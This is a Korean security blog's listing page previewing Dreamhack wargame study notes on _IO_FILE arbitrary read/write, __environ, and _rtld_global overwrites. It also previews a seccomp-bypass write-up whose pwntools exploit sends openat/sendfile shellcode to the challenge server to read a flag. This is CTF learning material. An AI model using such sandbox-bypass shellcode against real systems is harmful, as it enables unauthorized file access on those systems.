본문 바로가기

목록분류 전체보기 (365)

_IO_FILE Arbitrary Address Write

https://dreamhack.io/learn/274#1 로그인 | Dreamhack dreamhack.io #include #include #include char account_buf[1024]; int overwrite_me; void init() { setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); } int read_account() { FILE *fp; fp = fopen("flag", "r"); fread(account_buf, sizeof(char), sizeof(account_buf), fp); write(1, account_buf, sizeof(account_buf)); fclose(fp); } int main() { FILE *fp; char..
개념 정리 2022. 2. 10. 17:17
_IO_FILE Arbitrary Address Read

https://dreamhack.io/learn/273#1 로그인 | Dreamhack dreamhack.io // Name: iofile_aar // gcc -o iofile_aar iofile_aar.c -no-pie #include #include #include char flag_buf[1024]; FILE *fp; void init() { setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); } int read_account() { FILE *fp; fp = fopen("/home/iofile_aar/flag", "r"); fread(flag_buf, sizeof(char), sizeof(flag_buf), fp); fclose(fp); } int main(..
개념 정리 2022. 2. 10. 16:46
__environ

https://dreamhack.io/learn/270#1 로그인 | Dreamhack dreamhack.io __environ이라는 이름의 전역 변수가 존재한다. 이는 시스템 명령어를 실행하기 위한 execve 계열의 함수와 getenv 등 환경 변수와 관련된 함수에서 참조하는 변수이다. // Name: environ.c // Compile: gcc -o environ environ.c #include #include #include #include #include void sig_handle() { exit(0); } void init() { setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); signal(SIGALRM, sig_handle); alarm(5);..
개념 정리 2022. 2. 9. 16:44
overwrite _rtld_global

https://dreamhack.io/learn/269#1 로그인 | Dreamhack dreamhack.io dreamhack의 새로운 로드맵 중 _rtld_global에 대해 공부 했다. 알고 있었던 내용이지만 복습하는 마음으로 정리하기로 했다. // Name: ow_rtld.c // Compile: gcc -o ow_rtld ow_rtld.c #include #include void init() { setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); } int main() { long addr; long data; int idx; init(); printf("stdout: %p\n", stdout); while (1) { printf("> "); scanf("..
개념 정리 2022. 2. 7. 22:48
Bypass SECCOMP-1

해당 내용은 로드맵에 있는 문제로 새로운 방법을 알게 되어 포스팅을 했다. exploit code from pwn import * context.arch = 'x86_64' p = remote('host1.dreamhack.games' , 8982) shellcode = shellcraft.openat(0, "/home/bypass_syscall/flag") shellcode += shellcraft.sendfile(1, 'rax', 0, 0xffffffff) p.sendline(asm(shellcode)) p.interactive() 해당 문제는 sandbox seccomp가 걸려있다. open, write, exceve함수는 사용할 수 없다. 그래서 비슷한 함수인 openat, sendfile을 사용..
wargame/DreamHack 2022. 2. 7. 21:41
[레나 튜토리얼] 20

보호되어 있는 글입니다.
wargame/Lena 2022. 2. 7. 21:37
baseball

보호되어 있는 글입니다.
wargame/DreamHack 2022. 2. 3. 20:37
hash-bronws

보호되어 있는 글입니다.
wargame/DreamHack 2022. 2. 3. 13:06
이전 1 ··· 20 21 22 23 24 25 26 ··· 46 다음

티스토리툴바